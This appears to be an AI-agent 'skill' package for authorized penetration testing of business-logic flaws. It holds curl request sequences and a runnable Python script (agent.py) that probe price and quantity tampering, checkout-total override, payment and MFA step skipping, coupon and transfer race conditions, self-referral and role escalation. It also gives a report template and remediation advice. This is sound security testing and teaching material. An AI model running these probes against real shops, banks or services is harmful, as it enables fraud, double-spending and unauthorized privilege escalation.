npx skills add mukul975/Anthropic-Cybersecurity-SkillsMITRE ATT&CK
When to Use
- During authorized penetration tests when automated scanners have found few technical vulnerabilities
- When assessing e-commerce platforms for pricing, cart, and payment flow manipulations
- For testing multi-step workflows (registration, checkout, approval processes) for bypass opportunities
- When evaluating rate-limited features like vouchers, coupons, referrals, and rewards systems
- During security assessments of financial applications, voting systems, or any application with critical business rules
Prerequisites
- Authorization: Written penetration testing agreement covering business logic testing
- Burp Suite Professional: For intercepting and modifying multi-step request flows
- Application understanding: Thorough knowledge of the application's intended business workflows
- Multiple test accounts: Accounts at different privilege levels and states
- Browser DevTools: For examining client-side validation logic
- Documentation: Business requirements or user stories describing expected behavior
Workflow
Step 1: Map Business Workflows and Rules
Document all critical business processes and their expected constraints.
# Critical business flows to map:
# 1. Registration/Onboarding flow
# - Email verification requirements
# - Account approval process
# - Role assignment logic
# 2. E-commerce/Purchase flow
# - Product selection → Cart → Checkout → Payment → Confirmation
# - Price calculation logic
# - Discount/coupon application
# - Quantity limits
# - Shipping cost calculation
# 3. Authentication/Authorization flow
# - Login → MFA → Dashboard
# - Password reset → Token → New password
# - Role escalation/approval
# 4. Financial transactions
# - Balance check → Transfer → Confirmation
# - Withdrawal limits
# - Currency conversion
# Document expected constraints:
# - Minimum order amounts
# - Maximum quantity per item
# - Coupon usage limits (one per user)
# - Referral reward caps
# - Withdrawal daily limits
# - Account verification requirements before certain actionsStep 2: Test Price and Quantity Manipulation
Intercept and modify price, quantity, and total values in requests.
# Test negative quantity
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": -1, "price": 99.99}' \
"https://target.example.com/api/cart/add"
# Test zero price
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": 1, "price": 0}' \
"https://target.example.com/api/cart/add"
# Test extremely large quantity
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": 999999999}' \
"https://target.example.com/api/cart/add"
# Test decimal/float manipulation
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": 0.001, "price": 0.01}' \
"https://target.example.com/api/cart/add"
# Test integer overflow
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id": 1, "quantity": 2147483647}' \
"https://target.example.com/api/cart/add"
# Modify total amount directly in checkout request
# Intercept in Burp and change total from 299.99 to 0.01
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"cart_id": "abc123", "total": 0.01, "payment_method": "card"}' \
"https://target.example.com/api/checkout"Step 3: Test Workflow Step Bypass
Attempt to skip required steps in multi-step processes.
# Skip email verification
# Instead of: Register → Verify email → Access dashboard
# Try: Register → Access dashboard directly
curl -s -H "Authorization: Bearer $UNVERIFIED_TOKEN" \
"https://target.example.com/api/dashboard"
# Skip payment step
# Instead of: Cart → Shipping → Payment → Confirmation
# Try: Cart → Confirmation (skip payment)
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"cart_id": "abc123", "shipping_address": "123 Main St"}' \
"https://target.example.com/api/orders/confirm"
# Skip MFA step
# Instead of: Login → MFA → Dashboard
# Try: Login → Dashboard (skip MFA)
# After successful password auth, directly access protected resources
# Skip approval process
# Instead of: Submit request → Manager approval → Access granted
# Try: Submit request → Access granted (skip approval)
# Repeat a step that should be one-time
# Apply same coupon code multiple times
for i in $(seq 1 5); do
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"coupon_code": "DISCOUNT50"}' \
"https://target.example.com/api/cart/apply-coupon"
echo "Attempt $i"
doneStep 4: Test Race Conditions in Business Logic
Exploit timing windows in concurrent request processing.
# Race condition on coupon application
# Send multiple identical requests simultaneously
for i in $(seq 1 10); do
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"coupon_code": "ONETIME50"}' \
"https://target.example.com/api/cart/apply-coupon" &
done
wait
# Race condition on balance transfer
# If user has $100, try to transfer $100 to two accounts simultaneously
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"to": "user_b", "amount": 100}' \
"https://target.example.com/api/transfer" &
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"to": "user_c", "amount": 100}' \
"https://target.example.com/api/transfer" &
wait
# Race condition on reward claiming
# Using Burp Turbo Intruder for precise timing:
# 1. Send request to Turbo Intruder
# 2. Use race condition script template
# 3. Send 20+ requests simultaneously
# 4. Check if reward was claimed multiple timesStep 5: Test Referral and Reward System Abuse
Find ways to exploit promotional features and reward mechanisms.
# Self-referral: refer your own email
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"referral_email": "myown@email.com"}' \
"https://target.example.com/api/referrals/invite"
# Referral code reuse across multiple accounts
# Create multiple accounts and use same referral code
# Coupon stacking: apply multiple discount codes
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"coupon_codes": ["SAVE10", "WELCOME20", "VIP50"]}' \
"https://target.example.com/api/cart/apply-coupons"
# Abuse free trial: re-register with same details
# Test if email+1@domain.com or email@domain.com bypass duplicate detection
# Gift card / credit manipulation
# Buy gift card with gift card balance (circular)
# Apply gift card with value > purchase price (get change as credit)
# Test reward point manipulation
# Earn points on order → Cancel order → Keep points
curl -s -X POST \
-H "Authorization: Bearer $TOKEN" \
"https://target.example.com/api/orders/12345/cancel"
# Check if reward points from order 12345 were revokedStep 6: Test Role and Permission Logic
Assess authorization logic for privilege escalation through business processes.
# Role escalation via registration parameter
curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"email":"test@test.com","password":"Test1234!","role":"admin"}' \
"https://target.example.com/api/auth/register"
# Organization tenant boundary testing
# User in Org A tries to access Org B resources via business workflows
curl -s -X POST \
-H "Authorization: Bearer $TOKEN_ORG_A" \
-H "Content-Type: application/json" \
-d '{"org_id": "org_b_id", "action": "view_reports"}' \
"https://target.example.com/api/reports"
# Test for privilege retention after role downgrade
# Admin → Regular user: can they still access admin functions?
# Employee → Terminated: can they still access company resources?
# Test invitation/delegation abuse
# Invite user with higher privileges than inviter has
curl -s -X POST \
-H "Authorization: Bearer $REGULAR_TOKEN" \
-H "Content-Type: application/json" \
-d '{"email":"new@test.com","role":"admin"}' \
"https://target.example.com/api/users/invite"Key Concepts
| Concept | Description |
|---|---|
| Business Logic Flaw | A vulnerability in the application's workflow or rules that allows unintended actions |
| Price Manipulation | Modifying price, quantity, or total values in client-side requests |
| Workflow Bypass | Skipping required steps in a multi-step business process |
| Race Condition | Exploiting concurrent request processing to violate business constraints |
| Privilege Escalation | Gaining higher permissions through business process manipulation |
| Negative Testing | Testing with unexpected values (negative, zero, null, extreme) |
| State Manipulation | Changing application state in an order not intended by the business logic |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Suite Professional | Request interception, modification, and sequence testing |
| Burp Turbo Intruder | High-speed request sending for race condition testing |
| Burp Sequencer | Token randomness analysis for predictable reference testing |
| OWASP ZAP | Open-source alternative for proxy-based testing |
| Postman | Workflow testing with collection runners and environment variables |
| Custom scripts | Python/bash scripts for automated business logic testing |
Common Scenarios
Scenario 1: Coupon Code Stacking
An e-commerce site allows applying multiple coupon codes. By stacking "WELCOME10", "SAVE20", and "VIP30", the total discount exceeds the product price, resulting in a negative balance or free order.
Scenario 2: Race Condition on Fund Transfer
A banking application checks balance before transfer but does not lock the account. Sending two simultaneous $1000 transfers from a $1000 balance results in both succeeding, creating money from nothing.
Scenario 3: Checkout Price Override
The checkout flow sends the total amount in the POST body. Intercepting and changing the total from $499.99 to $0.01 results in a successful order at the manipulated price.
Scenario 4: Password Reset Token Reuse
The password reset flow generates a one-time token but does not invalidate it after use. The same token can be used repeatedly to reset the password.
Output Format
## Business Logic Vulnerability Finding
**Vulnerability**: Price Manipulation in Checkout Flow
**Severity**: Critical (CVSS 9.1)
**Location**: POST /api/checkout - `total` parameter
**OWASP Category**: A04:2021 - Insecure Design
### Reproduction Steps
1. Add item to cart (price: $499.99)
2. Proceed to checkout
3. Intercept POST /api/checkout request in Burp
4. Modify "total" from 499.99 to 0.01
5. Forward the request; order completes at $0.01
### Business Rules Violated
| Rule | Expected | Actual |
|------|----------|--------|
| Server-side price calculation | Total computed server-side | Client-submitted total accepted |
| Coupon single use | One coupon per order | Same coupon applied 5 times |
| Negative quantity check | Quantity >= 1 | Quantity -1 accepted (credit issued) |
| Race condition on transfer | Balance checked atomically | Dual transfer exceeded balance |
### Impact
- Financial loss: orders processed at attacker-controlled prices
- Inventory loss: products shipped for $0.01
- Reward abuse: unlimited referral credits via self-referral
- Double-spending via race condition on transfers
### Recommendation
1. Perform all price calculations server-side; never trust client-submitted totals
2. Implement server-side validation for quantity (positive integers only)
3. Use database-level locks or atomic transactions for financial operations
4. Implement idempotency keys to prevent duplicate transaction processing
5. Rate-limit and log coupon applications, referral submissions, and transfersReferences and resources
Everything below is rendered for inspection. Script files are read-only and never run.
References 1
api-reference.md1.8 KB
API Reference: Testing for Business Logic Vulnerabilities
requests Library
Concurrent Testing (Race Conditions)
import threading
def send_request():
resp = requests.post(url, headers=headers, json=payload)
results.append(resp.status_code)
threads = [threading.Thread(target=send_request) for _ in range(10)]
for t in threads: t.start()
for t in threads: t.join()Business Logic Test Categories
Price Manipulation Payloads
| Test | Payload | Expected |
|---|---|---|
| Negative quantity | {"quantity": -1} |
Should reject |
| Zero price | {"price": 0} |
Should reject |
| Float quantity | {"quantity": 0.001} |
Should reject for physical goods |
| Integer overflow | {"quantity": 2147483647} |
Should reject |
| Negative price | {"price": -99.99} |
Should reject |
Workflow Bypass Tests
- Skip email verification -> access dashboard
- Skip payment -> confirm order
- Skip MFA -> access protected resources
- Repeat one-time steps (coupon, voucher)
Race Condition Targets
| Endpoint | Risk |
|---|---|
| Coupon application | Applied multiple times |
| Balance transfer | Double spending |
| Reward claiming | Multiple claims |
| Inventory purchase | Overselling |
Referral/Reward Abuse
- Self-referral with own email
- Referral code reuse across accounts
- Coupon stacking (multiple codes)
- Earn points -> cancel order -> keep points
OWASP Category
- A04:2021 - Insecure Design
- Business logic flaws are not detectable by automated scanners
References
- OWASP Testing Business Logic: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/
- PortSwigger Business Logic: https://portswigger.net/web-security/logic-flaws
- requests docs: https://docs.python-requests.org/
Scripts 1
agent.py9.0 KB
#!/usr/bin/env python3
"""Agent for testing business logic vulnerabilities during authorized assessments."""
import requests
import json
import argparse
import urllib3
import threading
from datetime import datetime
from urllib.parse import urljoin
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def test_price_manipulation(base_url, token, cart_endpoint="/api/cart/add"):
"""Test price and quantity manipulation in purchase flows."""
print("\n[*] Testing price/quantity manipulation...")
findings = []
headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
url = urljoin(base_url, cart_endpoint)
test_cases = [
{"name": "negative_quantity", "payload": {"product_id": 1, "quantity": -1}, "severity": "CRITICAL"},
{"name": "zero_price", "payload": {"product_id": 1, "quantity": 1, "price": 0}, "severity": "CRITICAL"},
{"name": "float_quantity", "payload": {"product_id": 1, "quantity": 0.001}, "severity": "HIGH"},
{"name": "huge_quantity", "payload": {"product_id": 1, "quantity": 999999999}, "severity": "HIGH"},
{"name": "negative_price", "payload": {"product_id": 1, "quantity": 1, "price": -99.99}, "severity": "CRITICAL"},
]
for tc in test_cases:
try:
resp = requests.post(url, headers=headers, json=tc["payload"], timeout=10, verify=False)
if resp.status_code in (200, 201):
findings.append({
"type": "PRICE_MANIPULATION", "test": tc["name"],
"payload": tc["payload"], "status": resp.status_code,
"severity": tc["severity"],
})
print(f" [!] {tc['name']}: Accepted (status {resp.status_code})")
else:
print(f" [+] {tc['name']}: Rejected (status {resp.status_code})")
except requests.RequestException as e:
print(f" [-] {tc['name']}: Error - {e}")
return findings
def test_checkout_total_override(base_url, token, checkout_endpoint="/api/checkout"):
"""Test if the checkout total can be overridden in the request."""
print("\n[*] Testing checkout total override...")
findings = []
headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
url = urljoin(base_url, checkout_endpoint)
payloads = [
{"cart_id": "test", "total": 0.01, "payment_method": "card"},
{"cart_id": "test", "total": 0, "payment_method": "card"},
{"cart_id": "test", "amount": 0.01},
]
for payload in payloads:
try:
resp = requests.post(url, headers=headers, json=payload, timeout=10, verify=False)
if resp.status_code in (200, 201):
findings.append({
"type": "TOTAL_OVERRIDE", "payload": payload,
"status": resp.status_code, "severity": "CRITICAL",
})
print(f" [!] Checkout accepted with total={payload.get('total', payload.get('amount'))}")
except requests.RequestException:
continue
return findings
def test_coupon_reuse(base_url, token, coupon_endpoint="/api/cart/apply-coupon", code="DISCOUNT50"):
"""Test if a coupon can be applied multiple times."""
print(f"\n[*] Testing coupon reuse ({code})...")
findings = []
headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
url = urljoin(base_url, coupon_endpoint)
success_count = 0
for i in range(5):
try:
resp = requests.post(url, headers=headers, json={"coupon_code": code},
timeout=10, verify=False)
if resp.status_code in (200, 201):
success_count += 1
except requests.RequestException:
break
if success_count > 1:
findings.append({
"type": "COUPON_REUSE", "code": code, "times_applied": success_count,
"severity": "HIGH",
})
print(f" [!] Coupon applied {success_count} times!")
else:
print(f" [+] Coupon properly limited")
return findings
def test_workflow_bypass(base_url, token, steps):
"""Test if workflow steps can be skipped."""
print("\n[*] Testing workflow step bypass...")
findings = []
headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
for step in steps:
url = urljoin(base_url, step["endpoint"])
try:
resp = requests.request(step.get("method", "POST"), url, headers=headers,
json=step.get("payload", {}), timeout=10, verify=False)
if resp.status_code in (200, 201):
findings.append({
"type": "WORKFLOW_BYPASS", "step": step["name"],
"endpoint": step["endpoint"], "status": resp.status_code,
"severity": "HIGH",
})
print(f" [!] Step '{step['name']}' bypassed (status {resp.status_code})")
else:
print(f" [+] Step '{step['name']}' enforced (status {resp.status_code})")
except requests.RequestException:
continue
return findings
def test_race_condition(base_url, token, endpoint, payload, concurrent=10):
"""Test for race conditions by sending concurrent requests."""
print(f"\n[*] Testing race condition on {endpoint} ({concurrent} concurrent requests)...")
findings = []
headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
url = urljoin(base_url, endpoint)
results = []
def send_request():
try:
resp = requests.post(url, headers=headers, json=payload, timeout=10, verify=False)
results.append({"status": resp.status_code, "body": resp.text[:200]})
except requests.RequestException:
results.append({"status": 0, "body": "error"})
threads = [threading.Thread(target=send_request) for _ in range(concurrent)]
for t in threads:
t.start()
for t in threads:
t.join()
successes = sum(1 for r in results if r["status"] in (200, 201))
if successes > 1:
findings.append({
"type": "RACE_CONDITION", "endpoint": endpoint,
"concurrent": concurrent, "successes": successes, "severity": "CRITICAL",
})
print(f" [!] {successes}/{concurrent} requests succeeded (potential race condition)")
else:
print(f" [+] {successes}/{concurrent} succeeded (properly serialized)")
return findings
def test_self_referral(base_url, token, referral_endpoint="/api/referrals/invite", email="self@test.com"):
"""Test if self-referral is possible."""
print("\n[*] Testing self-referral...")
headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
url = urljoin(base_url, referral_endpoint)
try:
resp = requests.post(url, headers=headers, json={"referral_email": email},
timeout=10, verify=False)
if resp.status_code in (200, 201):
print(f" [!] Self-referral accepted")
return [{"type": "SELF_REFERRAL", "severity": "MEDIUM"}]
else:
print(f" [+] Self-referral blocked (status {resp.status_code})")
except requests.RequestException:
pass
return []
def generate_report(findings, output_path):
"""Generate business logic vulnerability report."""
report = {
"assessment_date": datetime.now().isoformat(),
"total_findings": len(findings),
"by_type": {},
"findings": findings,
}
for f in findings:
t = f.get("type", "UNKNOWN")
report["by_type"][t] = report["by_type"].get(t, 0) + 1
with open(output_path, "w") as fh:
json.dump(report, fh, indent=2)
print(f"\n[*] Report: {output_path} | Findings: {len(findings)}")
def main():
parser = argparse.ArgumentParser(description="Business Logic Vulnerability Testing Agent")
parser.add_argument("base_url", help="Base URL of the target application")
parser.add_argument("--token", required=True, help="Bearer token for authentication")
parser.add_argument("--cart-endpoint", default="/api/cart/add")
parser.add_argument("--checkout-endpoint", default="/api/checkout")
parser.add_argument("--coupon-code", default="DISCOUNT50")
parser.add_argument("-o", "--output", default="business_logic_report.json")
args = parser.parse_args()
print(f"[*] Business Logic Vulnerability Assessment: {args.base_url}")
findings = []
findings.extend(test_price_manipulation(args.base_url, args.token, args.cart_endpoint))
findings.extend(test_checkout_total_override(args.base_url, args.token, args.checkout_endpoint))
findings.extend(test_coupon_reuse(args.base_url, args.token, code=args.coupon_code))
findings.extend(test_race_condition(args.base_url, args.token,
args.cart_endpoint, {"coupon_code": args.coupon_code}))
findings.extend(test_self_referral(args.base_url, args.token))
generate_report(findings, args.output)
if __name__ == "__main__":
main()